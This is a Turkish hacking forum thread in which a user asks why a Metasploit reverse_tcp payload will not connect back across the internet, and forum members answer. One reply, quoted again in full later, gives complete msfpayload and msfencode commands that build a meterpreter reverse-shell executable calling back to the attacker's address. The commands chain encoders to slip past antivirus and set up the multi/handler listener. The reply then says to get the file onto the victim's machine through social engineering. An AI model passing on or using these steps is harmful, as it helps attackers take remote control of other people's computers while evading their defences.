Metasploit Kullananlar ?

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mx0TBT
    Mx0TBT's avatar
    Erkek

Merhaba murdiler

Metasploit in reverse_tcp payloadını lan agda degilde wan da kullanmaya calısıyorum yani

Giresundan istanbuldaki bilgisayara mudahale etmeye calısıyorum 

Suanlık deneme yapıyorum

modemin 5000 portuna gelen istekleri lan daki ipme yonlendirdim

payload a modem in ip adresini yazıp exe olarak olusturduktan sonra kurban yolluyorum.handler e ise landanki ip adresimi ve 5000 portu yazıyorum

ve dinlemede bekliyorum.

olması gereken su kurban exe actıktan sonra  modem in 5000 portuna istek yollucak bu istegide modem bana yonledircek ve ben zaten lan ip e gelen istekleri dinledimden baglantıyı kurucam

Ancak bu olmuyor nedeni nedir acaba ?

Aslında hepimiz eksiğiz biraz Leylası olmayan mecnunlarız Ne sıcacık bir ismail abimiz var. Nede kötü zamanda Yanımızda olan İskender babamız Ne mahellemizi mahalle yapan Erdal bakkalımız ne her kapıyı açan yavuz abimiz nede bize doğru yolu gösteren dedemiz.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ustura
    ustura's avatar
    Banlanmış Üye
    Erkek

modemin dmz = (nete direk cıkıs yapmanı saglar butun portların acılır ) özelligi varsa onu aç bide metaspolitte kullanılan payloadların cogu anti virusler tarafından algılanıyor kendi payloadını yazmak zorundasın exploitlerde oyle karsı tarafta av varsa metaspolit etkisiz kalır 

itsin oglum sen adam degilsin
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mx0TBT
    Mx0TBT's avatar
    Erkek

ustura bunu yazdı:
    -----------------------------

modemin dmz = (nete direk cıkıs yapmanı saglar butun portların acılır ) özelligi varsa onu aç bide metaspolitte kullanılan payloadların cogu anti virusler tarafından algılanıyor kendi payloadını yazmak zorundasın exploitlerde oyle karsı tarafta av varsa metaspolit etkisiz kalır 

hocam zaten kendi ustumde sanal makinede deniyorum baglantıyı bir kursaydık anti virus kısmına gecerdim diyodum modem in dmz buldum denicem

hani sen bu dedimi yapmısmıydın ?

Aslında hepimiz eksiğiz biraz Leylası olmayan mecnunlarız Ne sıcacık bir ismail abimiz var. Nede kötü zamanda Yanımızda olan İskender babamız Ne mahellemizi mahalle yapan Erdal bakkalımız ne her kapıyı açan yavuz abimiz nede bize doğru yolu gösteren dedemiz.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Tarikat Şeyhi
    HolyOne
    HolyOne's avatar
    Erkek

UPNP çözermi yapmak istediğini

tam anlamadım

Nush ile uslanmayanı etmeli tekdir, Tekdir ile uslanmayanın hakkı kötektir!
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mx0TBT
    Mx0TBT's avatar
    Erkek

HolyOne bunu yazdı:

UPNP çözermi yapmak istediğini

tam anlamadım

Hocam burda anlatmak istediklerim tamammen acıklıyor :)

http://www.youtube.com/watch?v=Dq5Q9P5Hd9c

6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mx0TBT
    Mx0TBT's avatar
    Erkek
    Dmz ile.2 defa ugrastim modem kafayi yiyo.net gelmiyo fabrika ayarlarina cevirsemde

7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mx0TBT
    Mx0TBT's avatar
    Erkek

adamda caktı davayı heralde wireles sifresini degistirdi elimizdeki internettende olduk :(

8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mx0TBT
    Mx0TBT's avatar
    Erkek

Sunu cozume ulastıracak bir baba yigit varmı ?

9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mx0TBT
    Mx0TBT's avatar
    Erkek

Yardımcı olacaklara wireshrak cıktısınıda yollayabilirim

10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SpoofU
    SpoofU's avatar
    Erkek

Anlamadığım nokta; hem wan da istanbuldaki bir makineyi hacklemeye çalışıyorum diyorsun hem de sanal makinada deniyorum diyorsun. neyse, istanbuldaki bir makinayı hacklemeye çalıştığını var sayıyorum.

normalde

cd /pentest/exploits/framework

msfpayload windows/meterpreter/reverse_tcp LHOST=senin-wan-ip-adresin LPORT=1234 x > /root/server.exe

komutuyla root dizininde server.exe yi oluşturursun. Karşı tarafta av olduğunu varsayarak .exe ni raw olarak birkaç şekilde encode edersin ama yine de bazı av ler yakalayabilir, farklı kombinasyonlar denemelisin.

örnek:

msfpayload windows/meterpreter/reverse_tcp LHOST=senin-wan-ip-adresin LPORT=1234 R |

msfencode -e x86/shikata_ga_nai -c 3 -t raw |

msfencode -e x86/fnstenv_mov -c 5 -t raw |

msfencode -e x86/call4_dword_xor -c 4 -t raw |

msfencode -e x86/countdown -c 4 -t raw |

msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/server.exe

server.exe yi bir kaç av den kaçırdık.

şimdi handler ile dinlemeye alalım:

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.1.x(lan ip adresin)

set LPORT 1234

exploit

bu aşamadan sonra farklı sosyal mühendislik yöntemleriyle server.exe yi kurbana yedirmen lazım.

Eğer ben de yukarıdakilerin aynısını yaptım diyorsan; Önce local ip adresine yönlerdirdiğin portu handleri çalıştırdıktan sonra http://www.canyouseeme.org/ adresinden kontrol et. open diyorsa ya karşı taraf av veya firewall kullanıyordur yada server.exe yi çalıştırmıyordur.

gece gece benden bu kadar.

Sevmem yazmayı, okumayı sevdiğim kadar.
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mx0TBT
    Mx0TBT's avatar
    Erkek

SpoofU bunu yazdı:

Anlamadığım nokta; hem wan da istanbuldaki bir makineyi hacklemeye çalışıyorum diyorsun hem de sanal makinada deniyorum diyorsun. neyse, istanbuldaki bir makinayı hacklemeye çalıştığını var sayıyorum.

normalde

cd /pentest/exploits/framework

msfpayload windows/meterpreter/reverse_tcp LHOST=senin-wan-ip-adresin LPORT=1234 x > /root/server.exe

komutuyla root dizininde server.exe yi oluşturursun. Karşı tarafta av olduğunu varsayarak .exe ni raw olarak birkaç şekilde encode edersin ama yine de bazı av ler yakalayabilir, farklı kombinasyonlar denemelisin.

örnek:

msfpayload windows/meterpreter/reverse_tcp LHOST=senin-wan-ip-adresin LPORT=1234 R |

msfencode -e x86/shikata_ga_nai -c 3 -t raw |

msfencode -e x86/fnstenv_mov -c 5 -t raw |

msfencode -e x86/call4_dword_xor -c 4 -t raw |

msfencode -e x86/countdown -c 4 -t raw |

msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/server.exe

server.exe yi bir kaç av den kaçırdık.

şimdi handler ile dinlemeye alalım:

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.1.x(lan ip adresin)

set LPORT 1234

exploit

bu aşamadan sonra farklı sosyal mühendislik yöntemleriyle server.exe yi kurbana yedirmen lazım.

Eğer ben de yukarıdakilerin aynısını yaptım diyorsan; Önce local ip adresine yönlerdirdiğin portu handleri çalıştırdıktan sonra http://www.canyouseeme.org/ adresinden kontrol et. open diyorsa ya karşı taraf av veya firewall kullanıyordur yada server.exe yi çalıştırmıyordur.

gece gece benden bu kadar.

Hocam sagolasın

İstanbul derken anlasılması icin dedim sanal olarak deniyorum ve antivirus ve firewallyok(sadece local ip lerle denedimde baglantı saglıyorum)

dediklerinin hepsini yaptım .modemi  ip me ve port uma yonlendirdim.Sabit ip aldım modemden.

server exe icin modem ip ni

handler icinse local ip alıp bekledim ancak server calıstırdımda baglantı olmadı.

Mantıken olması lazım ancak neden olmuyo kafayı yicem artık.

http://www.canyouseeme.org/

Success: I can see your service on78.169.28.* on port (4444)
    Your ISP is not blocking port 4444

Bu cevap verdi ve handlere baktımda  sending stage ... diye gozuktu.ancak

Ben server calıstırdımda hic bir baglantı donmedi

Acaba ben bunu local de denedim icin modem yonlendirmiyo olabilirmi ?

Mesaj 26 Temmuz 2012 (Persembe) Saat: 01:23'da Mx0TBT tarafından düzenlendi.

Toplam Hit: 3494 Toplam Mesaj: 22